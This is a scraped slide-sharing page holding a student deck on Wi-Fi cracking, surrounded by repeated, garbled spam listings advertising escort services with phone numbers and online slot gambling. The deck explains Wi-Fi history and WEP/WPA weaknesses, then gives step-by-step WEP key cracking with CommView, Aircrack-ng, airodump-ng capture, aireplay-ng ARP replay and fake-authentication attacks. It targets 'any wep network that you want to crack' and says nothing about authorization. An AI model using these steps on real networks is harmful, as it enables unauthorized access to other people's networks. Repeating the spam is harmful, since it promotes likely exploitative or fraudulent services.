Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Call Girls in Nagpur High Profile
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...roncy bisnoi
 
University management System project report..pdf
University management System project report..pdfUniversity management System project report..pdf
University management System project report..pdfKamal Acharya
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...ranjana rawat
 
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular ConduitsUNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduitsrknatarajan
 

Dernier (20)

Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptx
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
 
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANJALI) Dange Chowk Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINEDJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
 
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTINGMANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
MANUFACTURING PROCESS-II UNIT-1 THEORY OF METAL CUTTING
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
UNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISUNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSIS
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service NashikCall Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
Call Girls Service Nashik Vaishnavi 7001305949 Independent Escort Service Nashik
 
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptxBSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
BSides Seattle 2024 - Stopping Ethan Hunt From Taking Your Data.pptx
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
 
Roadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and RoutesRoadmap to Membership of RICS - Pathways and Routes
Roadmap to Membership of RICS - Pathways and Routes
 
University management System project report..pdf
University management System project report..pdfUniversity management System project report..pdf
University management System project report..pdf
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
 
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular ConduitsUNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduits
 

Wifi cracking Step by Step Using CMD and Kali Linux 2018

  • 1. * Contents *Introduction. *HISTORY AND TYPES OF WiFi. *What ARE WIFI NETWORK *IMPORTANT TERMINOLOGY *Wi-Fi SECURITY: METHODS OF WiFi *WEP ENCRYPION *WEP CRACKING USING WINDOWS *WEP CRACKING USING KALI *RESEARCH PAPERS *REFERENCES Project Name: Wifi Cracking Student Name: Mohammad Fareed University: MMMUT Gorakhpur E-mail ID: mohd.fareed1122@gmail.com
  • 2. * INTRODUCTION * Wi-Fi has emerged as the single most popular wireless network protocol of the 21st century. While other wireless protocols work better in certain situations, Wi-Fi technology powers most home networks, many business local area networks and public hotspot networks. * Some people erroneously label all kinds of wireless networking as “Wi-Fi” when in reality Wi-Fi is just one of many wireless technologies. * Research Paper: The security of wifi connections has been in and out of the news over the past * few years as the integrity of the wifi encryption process has been progressively * eroded. Wifi encryption is normally driven by the use of three flavours of passwords/ * passphrases – Wired Equivalent Privacy (WEP), Wifi Protected Access * (WPA) and WPA2 – which use different methodologies to ensure (to differing * degrees) the integrity of the wifi IP-based communications path. But all have * come under attack, with tools available to intercept and crack authentication. * Does this mean that wifi should now be considered insecure?
  • 3. * HISTORY AND TYPES OF WiFi * In the 1980s, a technology designed for wireless cash registers called WaveLAN was developed and shared with the Institute of Electrical and Electronics Engineers (IEEE) group responsible for networking standards, known as committee 802. This technology was further developed during the 1990s until the committee published standard 802.11 in 1997. * The initial form of Wi-Fi from that 1997 standard supported only 2 MBPS connections. This technology was not officially known as “Wi-Fi” from the beginning either; that term was coined only a few years as its popularity increased. An industry standards group has continued to evolve the standard ever since, generating a family of new versions of Wi-Fi called successively 802.11b, 802.11g, 802.11n, 802.11ac, and so on. Each of these related standards can communicate with each other, although newer versions offer better performance and more features. * Research Paper: Integrity in question * In 2004, the integrity of the WEP password system was called into question after the Aircrack wifi password-cracking suite was released. The open source suite – now known as Aircrack-ng and updated to perform attacks on the WPA/ WPA2 wifi password systems – consisted of a number of wireless auditing utilities: * • Airodump – a 802.11 packet capture program. * • Aireplay – a 802.11 packet injection program. * • Aircrack – a static WEP and WPAPSK key cracker. * • Airdecap – which decrypts WEP/WPA capture files.Because the amount of time it takes to hack an encrypted wireless network is dependent on the amount of traffic that the cracking software has access to, thesecond module of Aircrack – Aireplay –is viewed as the most useful program of the four, as it allows the wireless hacker to increase the network traffic and so speed up the hacking process. The third and fourth elements of the suite – Aircrack and Airdecap – were (and still are) useful to crackers because they work for both WEP and WPA encryption, although back in 2004 the processing power available at that time made the cracking of a WPA password a lengthy process – normally taking several weeks, even where multi-core processing power was used. This contrasted with a typical cracking time for WEP (in 2004) of 20 minutes or so – a time-frame that has been reduced to around 30 seconds using commercial software from Elcomsoft and others, as well as open source/freeware apps/ suites such as Aircrack.
  • 4. * What ARE WIFI NETWORK? Most of you would have used wireless network either in your college, office, hotel or airports. Wireless network have become so very common everywhere due to their great convenience and growing popularity of laptops. Typically an area that offers wireless internet access is known as a hotspot. Wi-Fi can be configured in one of two modes, called infrastructure mode Wi-Fi and ad-hoc mode Wi-Fi. Nearly all Wi- Fi setups use infrastructure mode, where client devices within range all connect to and communicate through a central wireless access point. Ad hoc Wi-Fi allows clients to connect directly to each other without the use of an access point * IMPORTANT TERMINOLOGY SSID: is short for service set identifier. It is public name of wireless network, which is used to identify a particular network.SSIDs are case sensitive and are a sequence of alphanumeric characters(letters or numbers). BSSID: stand for basic service set identifier is the 48-bit MAC address of the access point of a wireless network. WIRELESS ACCESS POINT: is a device that allows device (like laptop, mobile device)to connected to a wireless network using wifi & other wireless standards.
  • 5. PSK: stand for pre shared key and is commonly used in encryption system. It is a possword or secret key that is shared amonge all the users using that particular encryption system. RSSI: is short for received signal stregnth indication and reprenteds the signal strength of a wireless network. RSSI values range from 1 to 100. *Wi-Fi SECURITY: METHODS OF WiFi * Before cracking a Wi- Fi network, you must be aware of basic encryption techniques that protect a Wi-Fi network. These three methods of encryption are the major sources of vulnerability associated with wireless networks. The different types of Wireless Encryption Security techniques include the following: * WEP: WEP is Wired Equivalent Privacy that can be cracked easily when configured appropriately. This method of encryption can be cracked within few minutes. * WPA: WPA is Wi-Fi Protected Access that provides strong security. Even then, there is possibility to crack if the Wi-Fi password if short. However, wireless networks can be hacked easily using various tools. * WPA2: WPA2 is Wi-Fi Protected Access 2 that also eventually provides high security. You can hack this method of Wi-Fi encryption at the time of packet generation from Wi-Fi access points. MAC ADDRESS: start for media access control address is a 48bit unique address that identifier every node in network. Usually MAC address are assigned at the time of manufacture itself. for example, 00:02:2D17B9:E8 is a typical MAC address.
  • 6. * WEP ENCRYPION WEP stand for wired enquivalent privacy and it is a security protocol that encrypts data transmission over wireless network using a secret wepkey. There are typically 3 times of WEP key: 1) OFF. 2) 64-Bit. 3) 128 Bit.  WEAKNESS IN WEP ENCRYPTION: In the wep protocol the AP and All the client(users) connected to a wireless network should know the same security key or password. If the user does not know the wep shared key or password, then the user may not be allowed to connect the network. This gives an attacker planty of time to find out the encryption key of the network. Depending upon the network, the password of the user is usually 40bit or 104 bit. This is concatenated with the 24 IV vector to get a 64 bit or 128bit wep key. Which is used for encrypting all data packets. It took until December 2009 before leading security researcher Moxie Marlinspike – who has since gone on to develop a number of smartphone and tablet computing crypto applications for the Android platform – launched the WPAcracker.com website.1 Using a parallel processing set of servers, Marlinspike claimed that his systems could crack vulnerable WPA passwords in around 20 minutes, a process that would have taken a dual-core PC around 120 hours using suitable software at the time. The cloud-based service – which costs $17.00 a time – reportedly uses a400-node cluster of computers to run through around 130 million WPA password combinations in 20 minutes. To use the service, Internet users upload a copy of the handshake file that occurs when a wifi device starts negotiating a link with a wifi access point – downloaded off-air using AirCrack’s Airodump module or an open source utility such as Wireshark. Although Wireshark is generally best known as a packet sniffer and analyser, widely used for network troubleshooting, analysis, software and communications protocol development – its considerable evolution, since it was first launched as Ethereal, makes it a popular wifi analysis tool. The evolution of WPAcracker.com was notable in wireless cracking terms as – according to Marlinspike – although rainbow tables can be used to brute-force crack a WPA password, the process is truly brute force in nature because each cracking project is unique. As Marlinspike observes: “You have to build a unique set of rainbow tables for each network that you would potentially like to audit.” A rainbow table is essentially a precomputed table for reversing cryptographic hash functions, typically used for cracking password hashes.
  • 7. * WEP CRACKING USING WINDOWS • Your require the following tools to crack wep network using windows: • CommView for WiFi. • Aircrack-ng GUI windows. • Compatible wifi card that supports monitor mode. Step1: Start the commView app, it will put your network adaptor in the monitor mode and allow you to record data packets being transmitted across all the wifi network within range select any wep network that you want to crack choose a network has a good signal strength. Step2: Right click on the wep network & select the copy MAC address option. Step3: Select the Rules Tab in the menu at the top. Select mac address on the left column, anable MAC address rules in the center, select capture in the action and select both under add record paste the copied MAC address press the add MAC address mode. Step4: Click on the log in tab, enable auto saving and increase maximum directory size and average log file size options. Step5: now wait untill CmmView record around 10,000 gatra packets. Monitor the number of data packets by clicking on the packets tab. Step6: when you have around 10,000 data packets, then go to the login tab and then click the CONCATENATE LOGS button, select all the capture file option and save the combined log file anywhere on the your computer.
  • 8. Step7: Double click on the logfile, if you notice, 9247 dta packets has been recorded in this log file. Step8: Click on the file>export logs> wireshark/ TCP dump format and log file in the selected format anywhere on your computer. Strep9:Unzip the download file of aircrack-ng GUI and launch the Aircrack GUI application from the BIN folder. Step10: Aircrack-ng will launch and will automatically try to crack password. In the this case if you notice, it failed and tells me to try recording more data packets/Ivs. Step11: Lets wait till I have recorded 21628 dta packets/Ivs. Step12: Input the logfiles into Aircrack-ng and lets try againg! Step13: And now when I run aircrack-ng again, it cracks the password and displays it on the screen! As simple as that.
  • 10. * WEP CRACKING USING KALI You require the following crack wep network using Kali:  Kali linux Vmware or ISO.  Aircrack-ng.  Compatible wifi network card. Aircrack-ng suit of the tools comes with the following setr of tools: 1) Airmon-ng 2) Airodump-ng 3) Aireplay-ng 4) Aircrack-ng WEP Cracking using Kali are two types: 1) PASSIVE Technique 2) ACTIVE Technique PASSIVE WEP CRACKING TECHNIQUE Passive wep cracking is a technique where the attacker tries to crack the password by passively sniffing Ivs of the target network without sending/injecting any traffic to it. Step1: Put Your WiFi card into monitor mode: Put your wifi card in monitor mode so that it can listen to all packet being transmitted and not just packets send to your system. airmon-ng start wifi_interface_name For example, airmon-ng start wlan0
  • 11. a) check status of network interfaces: ifconfig b) Put wifi interface into monitor mode: airmon-ng start wlan0 c) Ensure wifi interface is in monitor mode: ifconfig (NOTE: if you notice secondary interface called mon0 is used when your wifi interface is put into monitor mode) d) Lets see what wifi networks we are able to catch: airdump-np wlan0 Step2: START DATA SNIFFER TO RECORD IVs: Capture Ivs of data packets being transmitted an only the target wifi network and ignore all other data packets: airodump-ng-c channel—bssid APMAC –w outputfile interface airodump-ng-c1—bssid 48:28:2F:DC:F5:D8 –w dump wlan0 Capture Ivs of data packets being transmitted only on the target wep network ingnore the rest. Step3:CRACKTHE WEP PASSWORD FROM THE CAPTURED IVS: Once you have captured enough number of Ivs(20,000-40,000) you can crack the wep passsword using the aircrack tool: aircrack-ng –b AP_MAC*.cap Another alternative technique is to use the FMS/korek technique: Aircrack-ng –k –b AP_MAC*.cap For example, in today”s example I will type: Aircrack-ng –b 48:28:2F:D5:D8 dump*.cap
  • 12. Step4: LET’S SEE WHAT WiFi NETWORKS WE ARE ABLE TO CATCH: airodump-ng wlan0 Important: Identify the BSSID(48:28:2F:D5:D8) and chabeel(1) of the wifi network you wish to crack and write it down somewhere, you will need them in the next step. * ACTIVE CRACKING WEP PASSWORD USING KALI The problem with Passive wep cracking is that it can take a very long since you have to wait for adequate number of Ivs to be captured, which can take 3-4 hours, if there is not enough traffic/active clients on the target wifi. In Active wep cracking; the attacker actively ingets data packets to target wifi network to generate additional Ivs and reduce the amount of time it takes to crack the password. Step1: PUT YOUR WiFi CARD INTO MONITOR MODE: Put wireless interface in monitor mode on the AP channel so that it can listen to All packet being transmitted and not just packets send to your system for example, airmon-ng start wlan0 Step2: TEST WHETHER INJECTION IS POSSIBLE OR NOT: Test whether your wifi card and the target wifi router are within close enough range for your computer to be able inject data packets into it. Not all wifi cards support data injection. aireplay-ng -9 interfacenam For example, aireplay-ng-9 mon0
  • 13. Step3: START DATA SNIFFER TO RECORD IVs: Capture Ivs of the data packets being transmitted on only the target wifi network and ignore all other data packets. airodump-ng –c chaneel –bssid APMAC –w output interface Airodump-ng –c1 –bssid 48:28:2F:D5:D8 –w dump mon0 Step4: ARP REQUEST REPLAY ATTACK: In order to crack wep keys it is important for an attacker to be able to record large number of Ivs from data packets being send across the target network. An ARP request replay attack can easily be executed using the aireplay-ng tool: aireplay-ng –arpreplay –b AP_MAC_FACKE_auth interfacename For example, aireplay-ng –arpreplay –48:28:2F:DC:F5:D8 mon0 Step5: FAKE AUTHENTICATION ATTACK: In the ARP request replay attack, the attacker sends an ARP packet to the router of the target wifi network AP so that it will; generate more Ivs. Fake authentication attack allows an attacker to associate its MAC address with the AP, so that it will not reject the ARP packets send to it in the ARP request replay attatck. This ensure that the target AP will generate new Ivs that can then the sniffed by the attacker to crack the wep key. Aireplay-ng -1 0 –e ESSID –a AP_MAC interfacename Step6: ARP REQUEST REPLAY ATTACK(ALTERNATE TECHNIQUE): In case airodump-ng shows you some order device that is already associated with the target wifi AP, then you can skip fake authentication and directyly perform ARP request replay attack using the MAC address of the associated device. For example, aireplay-ng –arpreplay –b 48:28:2F:D5:D8 –h 1C:65:9D:C6:47:29 mon0 (where -h is used to specify MAC address of the associated device).
  • 14. Step7: CRACK THE WEP PASSWORD FROM THE CAPTURED IVs: Once you have captured enough number of Ivs, you can try to crack the wep password using the aircrack tool: aircrack-ng –b AP_MAC*.cap Another alternative techniquye is to use the FMS/korek technique: Aircrack-ng-k-b AP_MAC*.cap Crack the WEP password from the captured Ivs Aircrack-ng –b 48:28:2F:D5:D8 dump*.cap After 15,000 Ivs the WEP password has now been cracked.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24. *